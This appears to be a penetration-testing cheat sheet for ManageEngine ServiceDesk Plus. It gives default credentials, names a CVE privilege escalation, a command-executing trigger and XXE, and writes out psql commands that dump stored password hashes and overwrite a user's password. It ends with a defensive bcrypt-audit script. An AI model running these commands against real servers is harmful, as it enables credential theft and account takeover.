ManageEngine Service Desk Plus (SDP)
Credentials
# default
administrator:administrator
# guest
guest:guest
Version
- On login screen
Port
- 8080/tcp
- 8081/tcp - NIO port?
Interesting URL Paths
# Mobile form
http://examplesite.com:8080/mc
Recon
- Check suspicious tickets, both open and closed. They may contain confidential information such as credentials.
Attacks
- Privilege escalation (CVE-2019-10008) - If you are having issues, try logging in manually as guest first, then execute the exploit from the CLI.
- Create a custom trigger that executes a command when a ticket is created (you need a valid admin account).
- XXE. Looks like this also works for 9.3
- Example attack path from HTB Helpline
Database
- Postgres DB runs on port 65432/tcp
- No way to recover the current password, but you can do a hard reset, I think
- Here is a query to enumerate users
./psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c "select * from aaauser"
./psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c "select aaauser.first_name, aaapassword.password from aaauser, aaapassword where aaauser.user_id = aaapassword.password_id "
- Update a user's password
# password: $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG
# salt: $2a$12$6VGARvoc/dRcRxOckr6Wmu
# NOTE:
# - We use backticks here to escape `$` (PowerShell). Without them, the command will fail.
./psql.exe -h 127.0.0.1 -p 65432 -U postgres -w -d servicedesk -c "update aaapassword set password='`$2a`$12`$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG', salt='`$2a`$12`$6VGARvoc/dRcRxOckr6Wmu' where password_id = 2;"
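The `password` and `salt` values above follow the bcrypt modular-crypt layout, and the `salt` column is simply the first 29 characters of the 60-character hash. Added example (not part of the original notes) for auditing rows exported from `aaapassword`: it flags pairs that are malformed, inconsistent, or below a chosen cost. The function names, the `min_cost` threshold and the constructed sample rows are assumptions.

```python
import re

# bcrypt modular-crypt layout: $<variant>$<2-digit cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# Values quoted on this page, plus constructed rows for the failure cases.
PAGE_HASH = "$2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG"
PAGE_SALT = "$2a$12$6VGARvoc/dRcRxOckr6Wmu"
LOW_COST_HASH = "$2a$04$" + "A" * 53  # constructed, not a real hash
SAMPLE_ROWS = [
    ("page values", PAGE_HASH, PAGE_SALT),
    ("constructed: salt from another row", PAGE_HASH, "$2a$12$" + "B" * 22),
    ("constructed: low cost", LOW_COST_HASH, LOW_COST_HASH[:29]),
    ("constructed: prefix lost", PAGE_HASH[7:], PAGE_SALT),
]


def parse_bcrypt(value):
    """Split a bcrypt string into its fields, or return None if malformed."""
    m = BCRYPT_RE.match(value)
    if m is None:
        return None
    variant, cost, salt, digest = m.groups()
    return {"variant": variant, "cost": int(cost), "salt": salt, "digest": digest}


def audit_row(password, salt, min_cost=10):
    """Return a list of findings for one password/salt column pair."""
    parsed = parse_bcrypt(password)
    if parsed is None:
        return ["password column is not a well-formed bcrypt string"]
    findings = []
    # Rebuild the expected salt column from the parsed hash fields.
    expected = "${variant}${cost:02d}${salt}".format(**parsed)
    if salt != expected:
        findings.append("salt column does not match the hash prefix")
    if not 4 <= parsed["cost"] <= 31:
        findings.append("cost outside bcrypt's valid range 4-31")
    elif parsed["cost"] < min_cost:
        findings.append(f"cost {parsed['cost']} is below the minimum {min_cost}")
    return findings


if __name__ == "__main__":
    for label, password, salt in SAMPLE_ROWS:
        print(label, "->", audit_row(password, salt) or "ok")
```

Any row whose hash equals the one published here has a publicly known password and should be treated as compromised.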